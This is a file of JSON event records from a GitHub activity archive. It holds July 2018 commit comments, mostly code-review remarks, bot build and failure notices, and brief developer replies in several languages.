{"id":"7973826935","type":"CommitCommentEvent","actor":{"login":"n18022"},"repo":{"name":"n18022/programming-term2"},"payload":{"comment":{"id":29728700,"position":null,"line":null,"path":null,"commit_id":"c63f11e8eff30c648def9b5037d6a196d6d232e5","created_at":"2018-07-17T01:34:26Z","updated_at":"2018-07-17T01:34:26Z","author_association":"OWNER","body":"アドバイスありがとうございます。修正しました。\r\n\r\n2018年7月14日 18:31 kinjo-icolle <notifications@github.com>:\r\n\r\n> うーん、ループのネストで同じカウンタiを使うのは良くないですね。\r\n> また、折角ループの中にいるのに、その中で1〜9という固定の値を登場させてるのもあんまりよろしくないです。\r\n>\r\n> ヒント：3行目にて掛ける数をi、5行目にて掛けられる数をjにしてみてください。\r\n>\r\n> あと、変数aは使用していないようですね。\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/n18022/programming-term2/commit/c63f11e8eff30c648def9b5037d6a196d6d232e5#commitcomment-29708664>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AldxpSGO4CukrAER4bLolyqR5Nh0-tHcks5uGbqHgaJpZM4VPy8k>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-17T01:34:26Z"}
{"id":"7973828424","type":"CommitCommentEvent","actor":{"login":"ankita88borsha"},"repo":{"name":"rdpeng/ProgrammingAssignment2"},"payload":{"comment":{"id":29728706,"position":null,"line":null,"path":null,"commit_id":"12eddbb9e0ef719234ba64db627c5a093ade25e3","created_at":"2018-07-17T01:35:04Z","updated_at":"2018-07-17T01:35:04Z","author_association":"NONE","body":"Please add comments to the functions definitions."}},"created_at":"2018-07-17T01:35:04Z"}
{"id":"7973828646","type":"CommitCommentEvent","actor":{"login":"ralphw441"},"repo":{"name":"ralphw441/hello-world"},"payload":{"comment":{"id":29728708,"position":null,"line":null,"path":null,"commit_id":"ffbdc034c6c16a4f6a87f00c2b5b48c51a92db70","created_at":"2018-07-17T01:35:10Z","updated_at":"2018-07-17T01:35:10Z","author_association":"OWNER","body":"first pull request"}},"created_at":"2018-07-17T01:35:10Z"}
{"id":"7973831553","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"Callek/redo"},"payload":{"comment":{"id":29728723,"position":null,"line":null,"path":null,"commit_id":"168f1d554a3598458ab749742343b2fd6b454e10","created_at":"2018-07-17T01:36:18Z","updated_at":"2018-07-17T01:36:18Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nobject has no property pull_request\n\n</details>"}},"created_at":"2018-07-17T01:36:18Z"}
{"id":"7973831893","type":"CommitCommentEvent","actor":{"login":"nsiregar"},"repo":{"name":"nsiregar/pegelinux"},"payload":{"comment":{"id":29728725,"position":null,"line":null,"path":null,"commit_id":"9061bbd4b7a1d2860ba82f847be7c9a71862c131","created_at":"2018-07-17T01:36:25Z","updated_at":"2018-07-17T01:36:25Z","author_association":"OWNER","body":"wah sepertinya memang harus diupdate lagi untuk tutornya, nanti ane update deh. sekalian yang issue kemarin db permission error"}},"created_at":"2018-07-17T01:36:25Z"}
{"id":"7973834417","type":"CommitCommentEvent","actor":{"login":"nirvn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":29728740,"position":null,"line":null,"path":null,"commit_id":"4baa3321e7953bf7ce4bf53006e07d021d2e994a","created_at":"2018-07-17T01:37:25Z","updated_at":"2018-07-17T01:37:25Z","author_association":"CONTRIBUTOR","body":"TIL; good catch."}},"created_at":"2018-07-17T01:37:25Z"}
{"id":"7973836881","type":"CommitCommentEvent","actor":{"login":"amyhynes"},"repo":{"name":"amyhynes/tictactoe"},"payload":{"comment":{"id":29728750,"position":null,"line":null,"path":null,"commit_id":"fb33d997de1b63c81bc8bb6e136729ef81c78b60","created_at":"2018-07-17T01:38:21Z","updated_at":"2018-07-17T01:38:21Z","author_association":"OWNER","body":"A program written in Java for an intro to computer science course at McGill. Allows the user to play tic-tac-toe against an AI"}},"created_at":"2018-07-17T01:38:21Z"}
{"id":"7973846038","type":"CommitCommentEvent","actor":{"login":"jfgrissom"},"repo":{"name":"sneakycactus/aws"},"payload":{"comment":{"id":29728762,"position":null,"line":null,"path":null,"commit_id":"5bf0e85ee36c9cd72654da9a7ef8fa449b032993","created_at":"2018-07-17T01:41:53Z","updated_at":"2018-07-17T01:41:53Z","author_association":"NONE","body":"Thanks so much for sharing this fix."}},"created_at":"2018-07-17T01:41:53Z"}
{"id":"7973846557","type":"CommitCommentEvent","actor":{"login":"jwflory"},"repo":{"name":"jwflory/conf"},"payload":{"comment":{"id":29728764,"position":5,"line":16,"path":"git/gitconfig","commit_id":"f0a29f34f973dea2e57aa33595bbdba45de500e7","created_at":"2018-07-17T01:42:05Z","updated_at":"2018-07-17T01:42:05Z","author_association":"OWNER","body":"@nikhita So many times in a week when I rebase with a dirty working tree. :sweat_smile: It was already put to use almost immediately after it was committed!"}},"created_at":"2018-07-17T01:42:05Z"}
{"id":"7973847512","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"Callek/redo"},"payload":{"comment":{"id":29728765,"position":null,"line":null,"path":null,"commit_id":"06500cbbe3fe2765efdc37b7e81c608ec015a881","created_at":"2018-07-17T01:42:25Z","updated_at":"2018-07-17T01:42:25Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nobject has no property pull_request\n\n</details>"}},"created_at":"2018-07-17T01:42:25Z"}
{"id":"7973847550","type":"CommitCommentEvent","actor":{"login":"Erikasb2004"},"repo":{"name":"Erikasb2004/fedesoft"},"payload":{"comment":{"id":29728766,"position":null,"line":null,"path":null,"commit_id":"3b3ab2a9f578c8493aa255ec7a87bdb5d186cf06","created_at":"2018-07-17T01:42:27Z","updated_at":"2018-07-17T01:42:27Z","author_association":"OWNER","body":"version 1.0"}},"created_at":"2018-07-17T01:42:27Z"}
{"id":"7973847784","type":"CommitCommentEvent","actor":{"login":"LyesSaadi"},"repo":{"name":"TheOpenMedium/HAY"},"payload":{"comment":{"id":29728767,"position":null,"line":null,"path":null,"commit_id":"75c14e293d24bca1ed41ccbad89580aada65296a","created_at":"2018-07-17T01:42:32Z","updated_at":"2018-07-17T01:42:32Z","author_association":"MEMBER","body":"I mean, adding scopes... :stuck_out_tongue_winking_eye: !"}},"created_at":"2018-07-17T01:42:32Z"}
{"id":"7973848918","type":"CommitCommentEvent","actor":{"login":"AryaWang23"},"repo":{"name":"AryaWang23/MoleculeOperationExercise"},"payload":{"comment":{"id":29728772,"position":12,"line":12,"path":"README.md","commit_id":"0778f12d07b95874aa130992eb102054e248a0a4","created_at":"2018-07-17T01:42:58Z","updated_at":"2018-07-17T01:42:58Z","author_association":"OWNER","body":"The rest train will be updated in few days."}},"created_at":"2018-07-17T01:42:58Z"}
{"id":"7973857462","type":"CommitCommentEvent","actor":{"login":"nikhita"},"repo":{"name":"jwflory/conf"},"payload":{"comment":{"id":29728783,"position":5,"line":16,"path":"git/gitconfig","commit_id":"f0a29f34f973dea2e57aa33595bbdba45de500e7","created_at":"2018-07-17T01:46:04Z","updated_at":"2018-07-17T01:46:04Z","author_association":"NONE","body":"\\o/"}},"created_at":"2018-07-17T01:46:04Z"}
{"id":"7973860073","type":"CommitCommentEvent","actor":{"login":"reffort"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29728789,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-17T01:47:05Z","updated_at":"2018-07-17T01:47:05Z","author_association":"CONTRIBUTOR","body":"I'll have to look at those, but in the justification document, if you are seeing very minor differences in letter adjustment numbers, I suspect that is probably due to having changed LAFACT from 1000 to 10000 (in tdef.h) to get better resolution for the calculations.  LAFACT also determines the resolution for the .letadj request and is used for the output.  1000 is too low, 10000 is not quite high enough.  I think Gunnar selected the 1000 number because pdfTeX (as described in Than's thesis) changed character sizes in 0.1 point increments and actually substituted glyphs from different physical fonts that were shrunk or stretched by MetaFont and with multiple master fonts.  I'll also recommend *not* using the TrueType version of Linux Libertine because it contains errors, and because the Heirloom code that handles TrueType fonts has some strange behaviors.  The OTF version is more usable.  The OpenType font Libertinus Serif (a fork of Libertine with some bug fixes) is much better all around.  I've stopped trying to use TrueType fonts because of the odd behavior (this is one of things I want to address when going through the font handling).\n\nOn the troff user document, I have no ideas off the top of my head, but if the document is built using the Termes fonts instead of the default Times fonts, are the results still different?  The default version of Times is missing a several glyphs that the document specifically requests in the text, in addition to all the groff character names at the end."}},"created_at":"2018-07-17T01:47:05Z"}
{"id":"7973863196","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"Callek/redo"},"payload":{"comment":{"id":29728810,"position":null,"line":null,"path":null,"commit_id":"731158e7e48a71c84fb8445275bc6c480c19ab2f","created_at":"2018-07-17T01:48:13Z","updated_at":"2018-07-17T01:48:13Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\ninterpolation of 'event' produced an array or object\n\n</details>"}},"created_at":"2018-07-17T01:48:13Z"}
{"id":"7973871960","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"Callek/redo"},"payload":{"comment":{"id":29728822,"position":null,"line":null,"path":null,"commit_id":"c596f8887a83364815e0494a97de7876f638d87f","created_at":"2018-07-17T01:51:37Z","updated_at":"2018-07-17T01:51:37Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nobject has no property head\n\n</details>"}},"created_at":"2018-07-17T01:51:37Z"}
{"id":"7973874003","type":"CommitCommentEvent","actor":{"login":"walf443"},"repo":{"name":"ondrejbartas/sidekiq-cron"},"payload":{"comment":{"id":29728825,"position":null,"line":null,"path":null,"commit_id":"4fdc29441cef52d50d394bfc27edee5d8d4b4b27","created_at":"2018-07-17T01:52:24Z","updated_at":"2018-07-17T01:52:24Z","author_association":"NONE","body":"does it not update Changes.md?"}},"created_at":"2018-07-17T01:52:24Z"}
{"id":"7973876747","type":"CommitCommentEvent","actor":{"login":"RyanBabij"},"repo":{"name":"RyanBabij/WorldSim"},"payload":{"comment":{"id":29728828,"position":4,"line":73,"path":"WorldTile.cpp","commit_id":"a8ff0e97d6417a0fcbe88b2d68fb2dc10536c531","created_at":"2018-07-17T01:53:26Z","updated_at":"2018-07-17T01:53:26Z","author_association":"OWNER","body":"Protip: Don't do this."}},"created_at":"2018-07-17T01:53:26Z"}
{"id":"7973888733","type":"CommitCommentEvent","actor":{"login":"ghutchis"},"repo":{"name":"OpenChemistry/avogenerators"},"payload":{"comment":{"id":29728842,"position":null,"line":null,"path":null,"commit_id":"c74dbfc49520bd868612f8512fb48770514a3749","created_at":"2018-07-17T01:58:00Z","updated_at":"2018-07-17T01:58:00Z","author_association":"MEMBER","body":"Wait, why? This seems completely un-necessary."}},"created_at":"2018-07-17T01:58:00Z"}
{"id":"7973889399","type":"CommitCommentEvent","actor":{"login":"iandouglas"},"repo":{"name":"MacInnes/sticker_overflow"},"payload":{"comment":{"id":29728844,"position":18,"line":18,"path":"spec/features/visitor/logout_spec.rb","commit_id":"7feba2246525f3841308460b93ab719ff00ca320","created_at":"2018-07-17T01:58:15Z","updated_at":"2018-07-17T01:58:15Z","author_association":"NONE","body":"try `click_button` here instead of click_on, when you change it back to `button_to` in your view"}},"created_at":"2018-07-17T01:58:15Z"}
{"id":"7973893237","type":"CommitCommentEvent","actor":{"login":"destdev"},"repo":{"name":"Fluorohydride/ygopro-scripts"},"payload":{"comment":{"id":29728852,"position":53,"line":90,"path":"c35199656.lua","commit_id":"92d06db327075e986288bffc95a2e0ad7096b00b","created_at":"2018-07-17T01:59:49Z","updated_at":"2018-07-17T01:59:49Z","author_association":"CONTRIBUTOR","body":"This ct seems to be calculated wrong now, it doesn't count the amount of cards but the amount of actions. Even if you add 2 or more, you still only receive 200."}},"created_at":"2018-07-17T01:59:49Z"}
{"id":"7975657956","type":"CommitCommentEvent","actor":{"login":"manik1235"},"repo":{"name":"manik1235/learningwithfriends"},"payload":{"comment":{"id":29732508,"position":null,"line":null,"path":null,"commit_id":"e6223a19b8505db238c6955a15b3e5a3b1e3a87f","created_at":"2018-07-17T10:01:29Z","updated_at":"2018-07-17T10:01:29Z","author_association":"OWNER","body":"How do you know it passes? (what message did the test give you?) "}},"created_at":"2018-07-17T10:01:29Z"}
{"id":"7975660201","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"openSUSE/libsolv"},"payload":{"comment":{"id":29732513,"position":504,"line":504,"path":"tools/repo2solv.c","commit_id":"66ddaae25a1a88bb552ca3465af8ae0cd9afb288","created_at":"2018-07-17T10:01:51Z","updated_at":"2018-07-17T10:01:51Z","author_association":"COLLABORATOR","body":"This is copied around, I wonder if it would be better to make it part of ext API. Thoughts?"}},"created_at":"2018-07-17T10:01:51Z"}
{"id":"7975664216","type":"CommitCommentEvent","actor":{"login":"Jeollos"},"repo":{"name":"Jeollos/hellow-me"},"payload":{"comment":{"id":29732519,"position":4,"line":4,"path":"README.md","commit_id":"295b242bf98436d824e67c1cfc50760568d3ab92","created_at":"2018-07-17T10:02:33Z","updated_at":"2018-07-17T10:02:33Z","author_association":"OWNER","body":"hii this is 2"}},"created_at":"2018-07-17T10:02:33Z"}
{"id":"7975664234","type":"CommitCommentEvent","actor":{"login":"JohnForster"},"repo":{"name":"archmagos/Makers-BNB"},"payload":{"comment":{"id":29732520,"position":8,"line":6,"path":"README.md","commit_id":"f5ecf26b13f09a1d4981d22ad7000ac56ebe9487","created_at":"2018-07-17T10:02:33Z","updated_at":"2018-07-17T10:02:33Z","author_association":"COLLABORATOR","body":"\"I want to multiple properties\" is not a sentence."}},"created_at":"2018-07-17T10:02:33Z"}
{"id":"7975666214","type":"CommitCommentEvent","actor":{"login":"Tra4er"},"repo":{"name":"drenkas/React-Redux-TODO"},"payload":{"comment":{"id":29732521,"position":12,"line":79,"path":"src/containers/VisiblePostList.js","commit_id":"23240fe00bfec9bf59e0811f67cc4aa7e0b8ee17","created_at":"2018-07-17T10:02:54Z","updated_at":"2018-07-17T10:02:54Z","author_association":"NONE","body":"Чому не: posts: state.todos.posts.toJS() ?"}},"created_at":"2018-07-17T10:02:54Z"}
{"id":"7975672388","type":"CommitCommentEvent","actor":{"login":"adnanlionking"},"repo":{"name":"JMccormick264/WhatsAppPP"},"payload":{"comment":{"id":29732530,"position":null,"line":null,"path":null,"commit_id":"bc07fbb619b453799a2f21f1231d3a97b72cc6b4","created_at":"2018-07-17T10:03:59Z","updated_at":"2018-07-17T10:03:59Z","author_association":"NONE","body":"where is link download I need WhatsApp 2 "}},"created_at":"2018-07-17T10:03:59Z"}
{"id":"7975675882","type":"CommitCommentEvent","actor":{"login":"notestaff"},"repo":{"name":"refresh-bio/KMC"},"payload":{"comment":{"id":29732532,"position":null,"line":null,"path":null,"commit_id":"f56a92a243ea4ea8a56e24e61b93fd1ab2a00520","created_at":"2018-07-17T10:04:36Z","updated_at":"2018-07-17T10:04:36Z","author_association":"NONE","body":"@marekkokot great, thanks.  can you tag a new release with these bugfixes, so that I can update the bioconda recipe to install the fixed version?   if not ready for a full numbered release it can be a pre-release e.g. 3.1.0-rc.1 ; just needs a tagged name."}},"created_at":"2018-07-17T10:04:36Z"}
{"id":"7975680264","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29732535,"position":9,"line":9,"path":"test/account-mgmt.test.js","commit_id":"333971814f38c25a39f7d12da41e46813302185a","created_at":"2018-07-17T10:05:26Z","updated_at":"2018-07-17T10:05:26Z","author_association":"NONE","body":"When you use a library that has an `internal` function, and you call that function, it is not making in internal transaction to another address on the state, it is actually calling the function internally. This is possible because the compiler took the `internal` function of the library and put it wholesale inside your contract, aka copy-pasted."}},"created_at":"2018-07-17T10:05:26Z"}
{"id":"7975681786","type":"CommitCommentEvent","actor":{"login":"rishabhkalra96"},"repo":{"name":"rishabhkalra96/PWA_Example"},"payload":{"comment":{"id":29732537,"position":27,"line":74,"path":"caching_project/public/src/js/feed.js","commit_id":"320dcfc20315564cb465698adbbd60c4ef6b9abb","created_at":"2018-07-17T10:05:43Z","updated_at":"2018-07-17T10:05:43Z","author_association":"OWNER","body":"ignore this variable for THIS particular concept"}},"created_at":"2018-07-17T10:05:43Z"}
{"id":"7975683390","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29732539,"position":9,"line":9,"path":"test/account-mgmt.test.js","commit_id":"333971814f38c25a39f7d12da41e46813302185a","created_at":"2018-07-17T10:06:02Z","updated_at":"2018-07-17T10:06:02Z","author_association":"NONE","body":"Whichever `import` statement or not you have.\r\nPrefer one file per object and `import`."}},"created_at":"2018-07-17T10:06:02Z"}
{"id":"7975688468","type":"CommitCommentEvent","actor":{"login":"mutoe"},"repo":{"name":"slimkit/plus-small-screen-client"},"payload":{"comment":{"id":29732549,"position":74,"line":32,"path":"README.md","commit_id":"fcb1a5309964b22bc79cd1995dd7684ddd989970","created_at":"2018-07-17T10:06:59Z","updated_at":"2018-07-17T10:06:59Z","author_association":"MEMBER","body":"这里要不要建议从release页面下载稳定的版本？master是nightly更新，可能(?)是带着bug提交的（逃）😂 "}},"created_at":"2018-07-17T10:06:59Z"}
{"id":"7975692278","type":"CommitCommentEvent","actor":{"login":"spadidapelli"},"repo":{"name":"spadidapelli/support-1.1"},"payload":{"comment":{"id":29732552,"position":null,"line":null,"path":null,"commit_id":"2e8bd9a8e5a855b2e3c2d2711b3bf4ce93a2cc06","created_at":"2018-07-17T10:07:42Z","updated_at":"2018-07-17T10:07:42Z","author_association":"OWNER","body":"approved"}},"created_at":"2018-07-17T10:07:42Z"}
{"id":"7975698770","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29732567,"position":57,"line":29,"path":"contracts/Splitter.sol","commit_id":"e7bf72a4462d74ff70a26166e95ef9a732f0dace","created_at":"2018-07-17T10:08:57Z","updated_at":"2018-07-17T10:08:57Z","author_association":"NONE","body":"You can make it a bit more readable with 2 `require`s on 2 lines."}},"created_at":"2018-07-17T10:08:57Z"}
{"id":"7975709494","type":"CommitCommentEvent","actor":{"login":"noscripter"},"repo":{"name":"gajus/react-css-modules"},"payload":{"comment":{"id":29732579,"position":15,"line":34,"path":"src/extendReactClass.js","commit_id":"e3c6cccd6dd65f03e292c17452729b3151698285","created_at":"2018-07-17T10:10:58Z","updated_at":"2018-07-17T10:10:58Z","author_association":"NONE","body":"React Component should not change its props directly.\r\n\r\nhttps://reactjs.org/docs/components-and-props.html"}},"created_at":"2018-07-17T10:10:58Z"}
{"id":"7975711395","type":"CommitCommentEvent","actor":{"login":"szuro"},"repo":{"name":"HenriqueCaires/ZabbixApi"},"payload":{"comment":{"id":29732584,"position":null,"line":null,"path":null,"commit_id":"22685198f09f04e2e46447fa4f16fa6e3f98d416","created_at":"2018-07-17T10:11:18Z","updated_at":"2018-07-17T10:11:18Z","author_association":"NONE","body":"The assumption that update intervals, history, trends, etc. are stored as ints is wrong.\r\nIf you look at the documentation for Zabbix API you'll find that they are defined as strings like \"15m\".\r\n\r\nThese changes make your package unusable with existing Zabbix installations that use mentioned convention. And if you try, you get messages like this:\r\n\"Could not convert string to integer: 90d. Path 'result[0].items[0].history'\""}},"created_at":"2018-07-17T10:11:18Z"}
{"id":"7975712036","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/three-ducks"},"payload":{"comment":{"id":29732586,"position":null,"line":null,"path":null,"commit_id":"6fd990640fa951e261e020d53af0c826afa14f4f","created_at":"2018-07-17T10:11:26Z","updated_at":"2018-07-17T10:11:26Z","author_association":"OWNER","body":"Build version: __`1.7.0-renovate/semantic-release-changelog-3.x.236`__ :crossed_fingers: [`renovate/semantic-release-changelog-3.x`](https://github.com/streamich/three-ducks/tree/renovate/semantic-release-changelog-3.x) on [*Travis*](https://travis-ci.org/streamich/three-ducks/builds/404826153) :tada:"}},"created_at":"2018-07-17T10:11:26Z"}
{"id":"7975714701","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/three-ducks"},"payload":{"comment":{"id":29732592,"position":null,"line":null,"path":null,"commit_id":"1938f36436db4850fd5b27330adab492a9ca7914","created_at":"2018-07-17T10:11:58Z","updated_at":"2018-07-17T10:11:58Z","author_association":"OWNER","body":"Build version: __`1.7.0-renovate/semantic-release-git-7.x.238`__ :crossed_fingers: [`renovate/semantic-release-git-7.x`](https://github.com/streamich/three-ducks/tree/renovate/semantic-release-git-7.x) on [*Travis*](https://travis-ci.org/streamich/three-ducks/builds/404826180) :tada:"}},"created_at":"2018-07-17T10:11:58Z"}
{"id":"7975716267","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29732595,"position":71,"line":110,"path":"contracts/Splitter.sol","commit_id":"c5fdd0f54b88d3ed807c368ed3184d5274df3e83","created_at":"2018-07-17T10:12:16Z","updated_at":"2018-07-17T10:12:16Z","author_association":"NONE","body":"If you want, you can play with multiple returns:\r\n\r\n```solidity\r\nfunction divide(uint value) pure returns(uint result, uint remainder) {\r\n```"}},"created_at":"2018-07-17T10:12:16Z"}
{"id":"7975718167","type":"CommitCommentEvent","actor":{"login":"narspt"},"repo":{"name":"juribeparada/MMDVM_HS"},"payload":{"comment":{"id":29732598,"position":null,"line":null,"path":null,"commit_id":"46ba5cc4f74d072aa545fd54fc5b64bb473e65bd","created_at":"2018-07-17T10:12:38Z","updated_at":"2018-07-17T10:12:38Z","author_association":"NONE","body":"Hi Andy, Would it be easy you eventually also add a define (or just tell me what can I change) to allow disabling D-Star AFC? I have some D-Star issues for long time that are making me mad... they happen only randomly from time to time and apparently more noticeable when I'm more far from the hotspot... thus with weaker or maybe interfered signal... I would like to test if disabling AFC would make any difference on my problem? (maybe AFC gets puzzled with signal strength variation or interferences?)\r\n\r\n(btw, concerning my problem... I did even post an issue about it at MMDVMHost repo, as I think anyway despite the signal issues, MMDVMHost/ircddbgateway should be able to recover and continue the stream but often that doesn't happen unfortunately, until release ptt and start again, only then I'm heard again...)"}},"created_at":"2018-07-17T10:12:38Z"}
{"id":"7975720406","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29732599,"position":99,"line":57,"path":"contracts/Splitter.sol","commit_id":"e7bf72a4462d74ff70a26166e95ef9a732f0dace","created_at":"2018-07-17T10:13:05Z","updated_at":"2018-07-17T10:13:05Z","author_association":"NONE","body":"Not sure what purpose this assignment serves."}},"created_at":"2018-07-17T10:13:05Z"}
{"id":"7975720492","type":"CommitCommentEvent","actor":{"login":"StandD4C"},"repo":{"name":"Necroogre/CodeGenerator"},"payload":{"comment":{"id":29732600,"position":null,"line":null,"path":null,"commit_id":"fa113048a27dba144739edb363202df59a63f8e1","created_at":"2018-07-17T10:13:06Z","updated_at":"2018-07-17T10:13:06Z","author_association":"NONE","body":"不明觉厉"}},"created_at":"2018-07-17T10:13:06Z"}
{"id":"7975722712","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29732601,"position":94,"line":52,"path":"contracts/Splitter.sol","commit_id":"e7bf72a4462d74ff70a26166e95ef9a732f0dace","created_at":"2018-07-17T10:13:31Z","updated_at":"2018-07-17T10:13:31Z","author_association":"NONE","body":"This `require` line is redundant because you have `require(allowance > 0`."}},"created_at":"2018-07-17T10:13:31Z"}
{"id":"7975724502","type":"CommitCommentEvent","actor":{"login":"SomeUserName1"},"repo":{"name":"SomeUserName1/hrtool"},"payload":{"comment":{"id":29732605,"position":null,"line":null,"path":null,"commit_id":"ceaf58af21dc9dd469a8cd67541d8d8a8496bfa2","created_at":"2018-07-17T10:13:51Z","updated_at":"2018-07-17T10:13:51Z","author_association":"OWNER","body":"@wenwei-dev i dont know where the correct place (i.e. file and method to call from) is to hook it up.\r\nMay you help me with that?"}},"created_at":"2018-07-17T10:13:51Z"}
{"id":"7975725652","type":"CommitCommentEvent","actor":{"login":"doggy8088"},"repo":{"name":"jerriep/airport-explorer-source"},"payload":{"comment":{"id":29732607,"position":null,"line":null,"path":null,"commit_id":"3505ff6ea061390c31f7dad95cc72a46f49df795","created_at":"2018-07-17T10:14:04Z","updated_at":"2018-07-17T10:14:04Z","author_association":"NONE","body":"I mean this: [ASP.NET Core 2.1.0-preview1: Improvements to IIS hosting | ASP.NET Blog](https://blogs.msdn.microsoft.com/webdev/2018/02/28/asp-net-core-2-1-0-preview1-improvements-to-iis-hosting/)  Just don't know this change will affect the reverse proxy behaviror or not."}},"created_at":"2018-07-17T10:14:04Z"}
{"id":"7975730845","type":"CommitCommentEvent","actor":{"login":"andwel"},"repo":{"name":"skullbe/Kaiserreich-Korean-Translation"},"payload":{"comment":{"id":29732615,"position":6,"line":381,"path":"Kaiserreich Korean Translation/localisation/KR_Baltic_Duchy_l_english.yml","commit_id":"fe00611b2aadd3d909bb97d5d274702dcab7e267","created_at":"2018-07-17T10:15:01Z","updated_at":"2018-07-17T10:15:01Z","author_association":"NONE","body":"황제는 우리의 독립에 대하여 분노한 상태이다. 그는 우리가 공식적으로 그를 우리의 군주이자 주인으로 인정하기를 요구한다"}},"created_at":"2018-07-17T10:15:01Z"}
{"id":"7975731701","type":"CommitCommentEvent","actor":{"login":"edo9300"},"repo":{"name":"Fluorohydride/ygopro-core"},"payload":{"comment":{"id":29732618,"position":null,"line":null,"path":null,"commit_id":"861b5bcded25bf182b71bac16265da9ee2b89481","created_at":"2018-07-17T10:15:11Z","updated_at":"2018-07-17T10:15:11Z","author_association":"CONTRIBUTOR","body":"I don't understand the point of making this change, those 2 functions are unrelated each other, and there's no need to overload that existing function to make a thing it doesn't need too @purerosefallen"}},"created_at":"2018-07-17T10:15:11Z"}
{"id":"7975734080","type":"CommitCommentEvent","actor":{"login":"SaFaGo"},"repo":{"name":"Ahmed-ShawkyEgy/Iris-dataset"},"payload":{"comment":{"id":29732621,"position":null,"line":null,"path":null,"commit_id":"f27bd0a7254c61b121c92b57c844f5d30299cfcf","created_at":"2018-07-17T10:15:38Z","updated_at":"2018-07-17T10:15:38Z","author_association":"NONE","body":"are you a PHP developer living in Egypt?"}},"created_at":"2018-07-17T10:15:38Z"}
{"id":"7975745894","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29732636,"position":null,"line":null,"path":null,"commit_id":"1314b89166111023bd5bf0ff55c9acebd8ff490c","created_at":"2018-07-17T10:17:57Z","updated_at":"2018-07-17T10:17:57Z","author_association":"COLLABORATOR","body":"<h3>ignore angular directives \"pt-popover\", support template strings (#2698)</h3>\n\nPreview: <strong><a href='https://18667-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18667-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18667-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-17T10:17:57Z"}
{"id":"7975747268","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29732642,"position":null,"line":null,"path":null,"commit_id":"4e9ddd83fd6d3ccd950d31b5b61d2b66422fbad1","created_at":"2018-07-17T10:18:15Z","updated_at":"2018-07-17T10:18:15Z","author_association":"COLLABORATOR","body":"<h3>valid SPDX license identifier (#2697)</h3>\n\nPreview: <strong><a href='https://18670-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18670-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18670-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-17T10:18:15Z"}
{"id":"7975748691","type":"CommitCommentEvent","actor":{"login":"h3adshotzz"},"repo":{"name":"zhuowei/XNUQEMUScripts"},"payload":{"comment":{"id":29732644,"position":null,"line":null,"path":null,"commit_id":"17c2ed1b255a29f0a18a92b765366a539280dd32","created_at":"2018-07-17T10:18:32Z","updated_at":"2018-07-17T10:18:32Z","author_association":"NONE","body":"Both give a return a[i] | a[i+1] << 8 | a[i+2] << 16 | a[i+3] << 24 error when running"}},"created_at":"2018-07-17T10:18:32Z"}
{"id":"7975754966","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29732657,"position":101,"line":71,"path":"contracts/Remittance.sol","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-17T10:19:47Z","updated_at":"2018-07-17T10:19:47Z","author_association":"NONE","body":"If the transaction fails, correct, all accounting will be reverted. \r\nThe failed transaction still remains in the blockchain because even though it failed, the miners got paid for what they simulated up to the `revert`."}},"created_at":"2018-07-17T10:19:47Z"}
